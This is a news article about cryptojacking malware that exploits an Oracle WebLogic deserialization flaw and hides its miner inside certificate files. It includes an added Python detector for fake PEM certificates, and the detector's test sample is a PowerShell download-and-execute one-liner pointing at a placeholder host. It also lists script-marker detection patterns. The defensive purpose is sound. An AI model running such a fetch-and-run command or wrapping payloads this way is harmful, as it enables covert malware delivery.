New cryptocurrency mining malware is exploiting a vulnerability in the Oracle WebLogic Server while it hides in plain sight.
Cybersecurity researchers at Trend Micro report that attackers are exploiting the vulnerability to install cryptojacking malware that mines Monero (XMR).
An ‘interesting twist’
The exploit targets a deserialization vulnerability that allows unauthenticated remote code execution, which Oracle addressed with a security patch in April.
Reports have nevertheless surfaced on InfoSec forums that attackers are actively exploiting the vulnerability (CVE-2019-2725) to install cryptocurrency mining malware on the systems of unsuspecting, still-unpatched victims.
Trend Micro has analyzed the data and found “an interesting twist” in regards to this latest cryptojacking campaign.
The cryptojacking malware hides in plain sight by hiding its code in certificate files.
Trend Micro notes that the use of certificate files to hide malware is not a new tactic, but it can be highly effective.
“By using certificate files for obfuscation purposes, a piece of malware can possibly evade detection since the downloaded file is in a certificate file format which is seen as normal, especially when establishing HTTPS connections,” Trend Micro notes.
Other malicious files not hidden
The report explains that, once the vulnerability has been exploited, the malware runs a PowerShell command on the compromised server.
This command then downloads a certificate file from the attacker’s command-and-control server, and the miner is carried inside that file rather than fetched as a recognizable executable.
Researchers note that when the PowerShell command is given, other malicious files besides the Monero cryptojacking malware are also downloaded.
However, these additional files are not hidden behind the certificate file, which Trend Micro says might indicate that the “obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date.”
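The hiding technique described above, as an added example that is not from the Trend Micro report or this article: a small Python check that pulls the Base64 body out of a PEM-style certificate file and tests whether the decoded bytes are really a DER-encoded certificate structure or just script text dressed up in a certificate wrapper. The PEM text wrapper, the two sample files and the example.invalid hostname are constructed assumptions for the demonstration; the page itself only says the payload was stored in a certificate file format. The check is general, so it also flags any other non-certificate payload smuggled in the same wrapper.

```python
import base64
import binascii
import re
import string

# PEM wraps a DER-encoded X.509 certificate in Base64 between these markers.
PEM_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----(?P<body>.*?)-----END CERTIFICATE-----", re.S
)
# Strings that have no business inside a certificate body (assumed indicators).
SCRIPT_MARKERS = re.compile(
    rb"(?i)powershell|invoke-expression|\biex\b|downloadstring|frombase64string"
)
PRINTABLE = set(string.printable.encode("ascii"))


def der_encode(tag: int, content: bytes) -> bytes:
    """Minimal DER TLV encoder, used here only to build the benign sample."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def der_outer_length(blob: bytes):
    """Total length claimed by a leading DER SEQUENCE header, or None if the
    blob does not start with one. An X.509 certificate is exactly one SEQUENCE
    spanning the whole file, so a mismatch means this is not a certificate."""
    if len(blob) < 2 or blob[0] != 0x30:          # 0x30 = constructed SEQUENCE
        return None
    first = blob[1]
    if first < 0x80:                                # short-form length
        return 2 + first
    n = first & 0x7F
    if n == 0 or n > 4 or len(blob) < 2 + n or blob[2] == 0:
        return None                                 # indefinite or non-minimal: not DER
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def inspect_certificate_file(text: str) -> dict:
    """Decide whether a PEM 'certificate' actually carries certificate bytes."""
    m = PEM_BLOCK.search(text)
    if not m:
        return {"verdict": "not-pem", "reasons": ["no PEM certificate block"]}
    try:
        blob = base64.b64decode("".join(m.group("body").split()), validate=True)
    except binascii.Error as exc:
        return {"verdict": "suspicious", "reasons": [f"Base64 body does not decode: {exc}"]}

    reasons = []
    claimed = der_outer_length(blob)
    if claimed is None:
        reasons.append("decoded payload does not start with a DER SEQUENCE")
    elif claimed != len(blob):
        reasons.append(f"DER length {claimed} does not match payload length {len(blob)}")
    ratio = sum(b in PRINTABLE for b in blob) / max(len(blob), 1)
    if ratio > 0.95:                                # real DER is mostly binary
        reasons.append(f"decoded payload is {ratio:.0%} printable text, not binary DER")
    hit = SCRIPT_MARKERS.search(blob)
    if hit:
        reasons.append(f"decoded payload contains script marker {hit.group(0)!r}")
    return {
        "verdict": "suspicious" if reasons else "looks-like-certificate",
        "reasons": reasons,
        "decoded_length": len(blob),
    }


def to_pem(raw: bytes) -> str:
    """Wrap arbitrary bytes in a PEM certificate envelope, 64 columns per line."""
    b64 = base64.b64encode(raw).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n"


# Constructed samples (not files from the campaign).
# Benign stand-in: one DER SEQUENCE holding an OCTET STRING of binary-looking bytes.
BENIGN_PEM = to_pem(der_encode(0x30, der_encode(0x04, bytes(range(200)))))
# Malicious stand-in: a placeholder PowerShell one-liner in the same wrapper;
# the hostname is a reserved example domain, not a real C&C.
MALICIOUS_PEM = to_pem(
    b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\r\n"
)

if __name__ == "__main__":
    for name, pem in (("benign", BENIGN_PEM), ("malicious", MALICIOUS_PEM)):
        print(name, inspect_certificate_file(pem))
```

The wrapper is only Base64 between two marker lines, so any tool that strips the markers and decodes (Windows' built-in certutil -decode does exactly that) will hand back whatever was put inside; the file extension proves nothing. The structural check here is a heuristic: for a full verdict, parse the bytes as X.509 with a real library and treat a failure to parse as the alert.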
Overall, Trend Micro recommends that companies using the Oracle WebLogic Server update to the latest patch to fix the security vulnerability.
Crypto malware reports abound
The digital realm can often be treacherous as malicious attackers develop and release new forms of malware.
One cryptocurrency mining malware, dubbed Beapy, is built on the NSA exploits that were leaked two years ago.
Researchers say that Beapy recently reached 12,000 unique infections spread across more than 700 companies, the majority of which are located in China.
Two malicious cryptocurrency-stealing apps that centered around wallets were recently removed from the Google Play store, although they had already been downloaded more than a thousand times.
A current Bitcoin scam lures victims with the promise of free cryptocurrency: a “Bitcoin Collector” program that supposedly generates a small amount of BTC every day.
In reality, the program installs malware instead.
The malware originally took the form of ransomware, but those attempts apparently met with little success, so it was reworked into a Trojan designed to steal information.